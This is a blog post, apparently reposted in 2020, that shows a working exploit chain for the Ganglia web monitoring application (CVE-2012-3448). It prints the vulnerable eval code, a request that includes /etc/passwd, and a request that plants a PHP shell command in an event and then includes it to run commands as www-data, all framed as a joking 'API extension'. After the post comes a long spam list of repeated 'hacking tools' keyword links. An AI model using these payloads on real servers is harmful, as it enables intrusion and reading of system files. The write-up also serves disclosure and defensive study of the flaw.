Saturday, August 29, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Read more


  1. Hacking Tools Github
  2. New Hacker Tools
  3. How To Make Hacking Tools
  4. Hacking Tools Name
  5. Hack Tools For Pc
  6. Hack Tools Mac
  7. Hack Tools For Mac
  8. Hacker Tools Software
  9. Pentest Tools For Windows
  10. Pentest Tools
  11. Underground Hacker Sites
  12. Pentest Reporting Tools
  13. Hacker Tools Windows
  14. Growth Hacker Tools
  15. How To Make Hacking Tools
  16. New Hacker Tools
  17. Hacker Tools 2020
  18. Game Hacking
  19. Hack Tools Mac
  20. Pentest Reporting Tools
  21. Physical Pentest Tools
  22. Github Hacking Tools
  23. Hacker Tools Mac
  24. Growth Hacker Tools
  25. Hack Tools
  26. Hacker Tools 2019
  27. Pentest Tools Online
  28. Hacking Tools 2020
  29. Wifi Hacker Tools For Windows
  30. Pentest Tools List
  31. Nsa Hacker Tools
  32. Black Hat Hacker Tools
  33. Hacking Tools For Kali Linux
  34. Pentest Tools Free
  35. Hacker Tool Kit
  36. Nsa Hacker Tools
  37. Pentest Tools For Ubuntu
  38. Hacking Tools Windows 10
  39. Pentest Recon Tools
  40. Hacker Tools Linux
  41. Hacking Tools Windows 10
  42. Hacker Tools
  43. Hack Website Online Tool
  44. Hacking Tools Download
  45. Hack Tools
  46. Hacker Tools Windows
  47. Hacking Tools For Windows 7
  48. Hacking Tools Usb
  49. Pentest Tools Apk
  50. Beginner Hacker Tools
  51. Tools 4 Hack
  52. Physical Pentest Tools
  53. How To Hack
  54. Hack Tools Online
  55. Hack Tools 2019
  56. Beginner Hacker Tools
  57. Hacking Tools For Windows Free Download
  58. Hacker Tools Windows
  59. Hacking Tools And Software
  60. Hacker Tools Online
  61. Hack Tools Download
  62. Hack Rom Tools
  63. Hacking Tools Hardware
  64. Tools 4 Hack
  65. Usb Pentest Tools
  66. Hacker Tools Apk Download
  67. Hacking Tools 2019
  68. Hack Tool Apk
  69. Pentest Tools Url Fuzzer
  70. Hacking Tools For Pc
  71. Pentest Tools Linux
  72. Hacking Tools Mac
  73. Hacking Tools
  74. Hack Tools For Windows
  75. Pentest Tools Find Subdomains
  76. Hacking Tools Usb
  77. Hacking Tools Online
  78. Pentest Tools Kali Linux
  79. Hacking Tools Kit
  80. Hacker Tools Github
  81. Pentest Tools Github
  82. Computer Hacker
  83. Hack Tools For Mac
  84. Hack Tools 2019
  85. Tools 4 Hack
  86. Free Pentest Tools For Windows
  87. Hacking Tools Mac
  88. Hack Tool Apk No Root
  89. Blackhat Hacker Tools
  90. Hack Website Online Tool
  91. Blackhat Hacker Tools
  92. Tools Used For Hacking
  93. Hacker Tools Hardware
  94. Hacking Tools Software
  95. Bluetooth Hacking Tools Kali
  96. Hacking Tools Free Download
  97. Hacker Search Tools
  98. Physical Pentest Tools
  99. Top Pentest Tools
  100. Hack Tool Apk No Root
  101. Pentest Tools Website
  102. Usb Pentest Tools
  103. Hacker Tools
  104. Hack Tools
  105. Pentest Tools Subdomain
  106. Pentest Tools Find Subdomains
  107. Hacking Tools Download
  108. Hack Tools
  109. Hacking Tools 2020
  110. Termux Hacking Tools 2019
  111. Pentest Tools Open Source
  112. Hacker Tools
  113. Hacking Tools 2020
  114. Hack Tools 2019
  115. Hacking Tools For Windows Free Download
  116. Hacker
  117. Hacker Tools
  118. Hacking Tools For Windows Free Download
  119. Github Hacking Tools
  120. Hacking Tools For Pc
  121. Pentest Tools Review
  122. Kik Hack Tools
  123. Hacker Tools 2020
  124. Hack Tools For Mac
  125. Pentest Tools Free
  126. Hacker Tools
  127. Pentest Tools Alternative
  128. Pentest Reporting Tools
  129. Hacking Tools For Windows 7
  130. Hack Tools For Windows
  131. Hacker Tools For Pc
  132. Hacking Tools 2019
  133. Hacker Tools Apk Download
  134. Github Hacking Tools
  135. Bluetooth Hacking Tools Kali
  136. Tools For Hacker
  137. Hacker Tools Apk Download
  138. Easy Hack Tools
  139. Hacking Tools And Software
  140. Hack Tools For Games
  141. Hacking Tools
  142. Pentest Tools Online
  143. Hacking Tools Windows
  144. Hacker Tools List
  145. Hack Tools Pc
  146. Hacking Tools For Beginners
  147. How To Hack
  148. Pentest Tools Apk
  149. Hack Website Online Tool
  150. Hacker Tools Hardware
  151. Easy Hack Tools

No comments: